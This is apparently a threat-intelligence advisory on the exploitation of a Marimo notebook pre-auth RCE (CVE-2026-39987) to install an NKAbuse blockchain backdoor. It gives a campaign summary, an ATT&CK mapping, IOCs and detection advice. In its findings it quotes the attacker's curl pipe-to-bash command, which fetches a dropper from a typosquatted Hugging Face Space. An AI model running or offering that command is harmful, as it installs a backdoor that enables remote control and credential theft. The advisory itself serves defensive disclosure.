← Back to feed
2026-05-01 Malicious ToolMalware TLP:CLEAR

CVE-2026-39987: Marimo Pre-Auth RCE Weaponized to Drop NKAbuse Blockchain Backdoor From Hugging Face Spaces

Date: 2026-05-01
TLP: TLP:CLEAR
Tags: malicious-tool, malware

Executive Summary

CVE-2026-39987, a CVSS 9.3 unauthenticated remote code execution flaw in the Marimo Python notebook platform's /terminal/ws WebSocket endpoint, was disclosed on April 8, 2026 and exploited within 10 hours. Sysdig's Threat Research Team reported on April 16, 2026 that 11 unique source IPs from 10 countries generated 662 exploit events between April 11 and April 14, including a campaign that delivered an undocumented variant of the NKN-blockchain-based NKAbuse Go backdoor (kagent) hosted on the typosquatted Hugging Face Space vsccode-modetx. Defenders running Marimo must upgrade to 0.23.0 or later immediately, and hunt for kagent, ~/.kagent/, and outbound NKN protocol traffic on hosts that ran any vulnerable Marimo instance.

Campaign Summary

FieldDetail
Campaign / MalwareNKAbuse "kagent" via Marimo CVE-2026-39987
AttributionUnattributed; opportunistic mass exploitation observed from 11 source IPs (confidence: none)
TargetInternet-exposed Marimo notebook deployments (data scientists, AI dev environments)
VectorPre-auth RCE on /terminal/ws WebSocket; payload staged from Hugging Face Spaces
Statusactive (vulnerability patched in 0.23.0; exploitation ongoing)
First Observed2026-04-08 (disclosure); first observed exploitation 2026-04-08 (within ~10 hours)

Detailed Findings

According to Resecurity, Positive Technologies, and Sysdig, CVE-2026-39987 affects all Marimo versions through and including 0.20.4. The /terminal/ws WebSocket endpoint exposes a full PTY shell without authentication validation, allowing an unauthenticated attacker on any network path to the Marimo server to spawn arbitrary commands as the Marimo process user. The flaw was disclosed on April 8, 2026; Sysdig and BleepingComputer report exploitation began within roughly 10 hours of disclosure.

According to Sysdig's Threat Research Team, between April 11 and April 14, 2026, 11 unique source IPs across 10 countries generated 662 distinct exploit events against honeypots and customer telemetry. The activity included reverse shells, credential extraction, DNS exfiltration, lateral movement to PostgreSQL and Redis using credentials harvested from the host, and deployment of a previously undocumented malware variant. SC Media corroborated the multi-actor pattern as "multiple attacks weaponizing critical Marimo RCE."

Sysdig reports the most distinctive sample was delivered from IP 38.147.173.172 (Hong Kong). The actor issued curl -fsSL https://vsccode-modetx.hf.space/install-linux.sh | bash, retried three times, and returned 20 minutes later to verify execution. The dropper URL points to a Hugging Face Space named vsccode-modetx, a deliberate typosquat of "VS Code." The Space hosts the dropper install-linux.sh (SHA-256 25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13) and a binary named kagent, mimicking the legitimate Kubernetes AI agent framework name. According to Sysdig, the dropper supports cross-platform installation, downloads the kagent binary, installs it locally, and sets up persistence via systemd unit, cron entry, or macOS LaunchAgent depending on the host.

According to Sysdig, GBHackers, and Cybersecurity News, kagent is a stripped, UPX-packed Go ELF that unpacks from approximately 4.3 MB to 15.5 MB and represents a previously undocumented variant of NKAbuse, a backdoor family that uses the NKN (New Kind of Network) decentralised blockchain protocol for command-and-control. NKN-based C2 sidesteps DNS- and IP-based block lists because traffic relays peer-to-peer over the NKN network rather than reaching a fixed C2 host.

According to BleepingComputer and Sysdig, separate exploit waves observed during the same window also conducted reverse shell campaigns, credential extraction (including cloud credentials and SSH keys), DNS exfiltration, and lateral movement using credentials looted from the Marimo host into adjacent PostgreSQL and Redis services. This multi-actor behaviour is consistent with mass exploitation rather than a single targeted operation.

Marimo addressed the vulnerability in release 0.23.0. The Hacker News, GBHackers, and Security Affairs all urge organisations to upgrade immediately, restrict Marimo to localhost or to authenticated reverse proxies, and audit hosts that exposed the /terminal/ws endpoint to the internet at any point since April 8, 2026.

MITRE ATT&CK Mapping

TechniqueIDContext
Exploit Public-Facing ApplicationT1190Pre-authentication RCE on /terminal/ws WebSocket of Marimo prior to 0.23.0
Command and Scripting Interpreter: Unix ShellT1059.004install-linux.sh dropper executed via curl pipe-to-bash
Ingress Tool TransferT1105Download of kagent and install-linux.sh from vsccode-modetx.hf.space Hugging Face Space
Resource Hijacking via Hosting ServiceT1583.006Adversary-controlled Hugging Face Space used as staging infrastructure
Persistence: Systemd ServiceT1543.002kagent installed as systemd user service on Linux hosts
Persistence: Scheduled Task/Job: CronT1053.003Cron entry created where systemd not available
Persistence: Launch AgentT1543.001macOS LaunchAgent persistence path
Application Layer Protocol: Web ProtocolsT1071.001HTTPS download of dropper and binary from .hf.space domain
Application Layer ProtocolT1071NKN blockchain protocol used for C2, evading IP/DNS reputation controls
Obfuscated Files or Information: Software PackingT1027.002UPX-packed Go ELF binary
Credentials from Password StoresT1555Harvest of credentials from Marimo host filesystem and environment
Lateral Movement: Remote ServicesT1021Use of stolen credentials against adjacent PostgreSQL and Redis services

IOCs

Domains

vsccode-modetx.hf.space

Full URL Paths

vsccode-modetx.hf.space/install-linux.sh

Splunk Format

"vsccode-modetx.hf.space" OR "vsccode-modetx.hf.space/install-linux.sh" OR "38.147.173.172" OR "kagent.service" OR ".kagent/"

File Hashes

25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13

IP Indicators

38.147.173.172

Package Indicators

The campaign abuses a Hugging Face Space rather than a package registry; no PyPI or npm IOCs apply. The vulnerable software is the Marimo Python notebook (versions ≤ 0.20.4); upgrade to 0.23.0 or later.

Detection Recommendations

Web proxy and EDR: alert on any host that fetched https://vsccode-modetx.hf.space/install-linux.sh or any other resource from vsccode-modetx.hf.space. Treat such hosts as compromised.

Network: monitor for outbound connections matching NKN protocol traffic patterns from servers and developer workstations, particularly from any host that ran Marimo. NKN traffic typically uses peer-to-peer relay to NKN nodes; alert on persistent outbound flows from non-Web/cloud workloads to mixed-IP NKN relay endpoints.

Host hunting: search for the directory ~/.kagent/, the systemd unit kagent.service, the binary name kagent in user bin/ and home directories, cron entries referencing kagent, and macOS LaunchAgents plists for kagent. Confirm against legitimate kagent (Kubernetes AI agent framework) installations before remediating.

Marimo hardening: audit the Marimo version on every host running the notebook server. Block external access to /terminal/ws, place Marimo behind authenticated reverse proxies, and upgrade to 0.23.0 or later. Inspect Marimo process accounting and audit logs for unexpected curl, bash, python, sh invocations between April 8 and the time of patch.

Database lateral movement: review PostgreSQL and Redis audit logs and authentication histories for the period since April 8, 2026, prioritising credentials that were ever stored on a Marimo host filesystem or environment.

Hugging Face hygiene: track which Hugging Face Spaces and Models are reachable from data-science workstations, and apply egress filtering or proxy logging to *.hf.space to support post-compromise hunting.

References